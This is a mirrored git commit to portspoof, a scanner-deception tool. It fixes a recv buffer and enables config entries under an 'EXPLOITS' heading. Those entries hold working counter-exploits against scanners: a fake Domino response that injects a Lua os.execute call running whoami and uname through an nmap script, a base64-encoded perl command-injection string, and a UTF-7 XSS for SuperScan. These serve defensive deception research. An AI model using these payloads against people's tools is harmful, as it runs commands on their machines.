mirror of
https://github.com/drk1wi/portspoof.git
synced 2024-06-28 09:41:36 +00:00
Fixed buffer len for recv
This commit is contained in:
parent
042ad01496
commit
600287f90f
@ -69,7 +69,7 @@ void* process_connection(void *arg)
|
||||
int tid = *((int*)(&arg));
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
char buffer[1000];//TODO: to be fixed
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
time_t timestamp;
|
||||
@ -79,7 +79,6 @@ void* process_connection(void *arg)
|
||||
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
@ -91,7 +90,7 @@ void* process_connection(void *arg)
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
n = recv(threads[tid].clients[i], buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
|
@ -75,23 +75,33 @@
|
||||
|
||||
#Example: port range
|
||||
|
||||
#51-60 "550 4m2v4 (FUZZ_HERE)"
|
||||
51-60 "550 4m2v4 (FUZZ_HERE)"
|
||||
|
||||
#Example: Simple regular expression payloads
|
||||
|
||||
#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
|
||||
#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
|
||||
#8082 "word: ... \. \d \w \n"
|
||||
8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
|
||||
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
|
||||
8082 "word: ... \. \d \w \n"
|
||||
|
||||
#Nmap regular expression matched payloads
|
||||
|
||||
#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
|
||||
#8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
|
||||
#8102 "550 12345 FUZZ_HERE"
|
||||
#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
|
||||
#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
|
||||
8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
|
||||
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
|
||||
8102 "550 12345 FUZZ_HERE"
|
||||
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
|
||||
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"
|
||||
|
||||
## EXPLOITS ##
|
||||
|
||||
# NMAP
|
||||
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4
|
||||
|
||||
80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22 value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"
|
||||
|
||||
#OS cmd injection payload for bash: $(cat output) and `cat output` injections
|
||||
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"
|
||||
|
||||
#McAffe SuperScan UTF7 XSS payload
|
||||
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user